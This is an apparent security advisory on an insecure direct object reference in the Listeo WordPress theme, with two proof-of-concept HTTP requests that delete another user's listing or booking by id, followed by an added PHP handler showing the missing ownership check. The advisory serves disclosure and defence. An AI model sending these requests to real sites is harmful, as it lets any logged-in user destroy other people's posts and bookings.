The theme did not ensure that the post/page or booking to be deleted belongs to the user making the request, allowing any authenticated user to delete arbitrary pages/posts and bookings via an IDOR vector.
### -- [ PoC #1 | Authenticated IDOR | Permanent post/page deletion: ]

[!] https://listeo.pro/my-listings/?status=pending&action=delete&listing_id=13&_wpnonce=88a432b100

[!] GET /my-listings/?action=delete&listing_id=13&_wpnonce=88a432b100 HTTP/1.1
Host: listeo.pro
Cookie: [user cookies]

### -- [ PoC #2 | Authenticated IDOR | Permanent booking deletion: ]

[!] POST /wp-admin/admin-ajax.php HTTP/1.1
Host: listeo.pro
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Cookie: [user cookies]

action=listeo_bookings_manage&booking_id=13&status=deleted
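PoC #1 carries a valid `_wpnonce` and still succeeds, because a nonce only ties the request to the caller's session and says nothing about who owns `listing_id`. The handler below is an added example of the missing ownership check for the post/page case, not the theme's own code: the function name, the nonce action name, the hook and the `delete_others_posts` fallback for moderators are assumptions.

```php
<?php
// Added example: hypothetical front-end delete handler for a WordPress theme.
// Not Listeo's code; function, hook and nonce action names are assumptions.

function example_handle_listing_delete() {
    if ( ! isset( $_GET['action'], $_GET['listing_id'], $_GET['_wpnonce'] )
        || 'delete' !== $_GET['action'] ) {
        return; // Not a delete request; let the page render normally.
    }
    if ( ! is_user_logged_in() ) {
        wp_die( 'Authentication required.', '', array( 'response' => 403 ) );
    }

    $listing_id = absint( $_GET['listing_id'] );
    $nonce      = sanitize_text_field( wp_unslash( $_GET['_wpnonce'] ) );

    // CSRF defence only. Binding the object id into the action name stops a
    // nonce issued for one listing being replayed against another, but it is
    // still not an authorization decision.
    if ( ! wp_verify_nonce( $nonce, 'example_delete_listing_' . $listing_id ) ) {
        wp_die( 'Invalid request token.', '', array( 'response' => 403 ) );
    }

    $post = get_post( $listing_id );
    if ( ! $post ) {
        wp_die( 'Listing not found.', '', array( 'response' => 404 ) );
    }

    // The authorization step the advisory says was missing: the object must
    // belong to the requester, or the requester must hold an elevated
    // capability (assumed here to be delete_others_posts).
    $is_owner = ( (int) $post->post_author === get_current_user_id() );
    if ( ! $is_owner && ! current_user_can( 'delete_others_posts' ) ) {
        wp_die( 'You do not own this listing.', '', array( 'response' => 403 ) );
    }

    // Trash instead of permanent deletion so a mistaken or abusive request
    // can be reverted by an administrator.
    wp_trash_post( $listing_id );

    wp_safe_redirect( remove_query_arg( array( 'action', 'listing_id', '_wpnonce' ) ) );
    exit;
}
add_action( 'template_redirect', 'example_handle_listing_delete' );
```

The booking request in PoC #2 needs the same comparison between the booking's owner and `get_current_user_id()` before the status change is applied.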
m0ze
m0ze
No
2021-05-16 (about 1 year ago)
2021-05-16 (about 1 year ago)
2021-05-18 (about 1 year ago)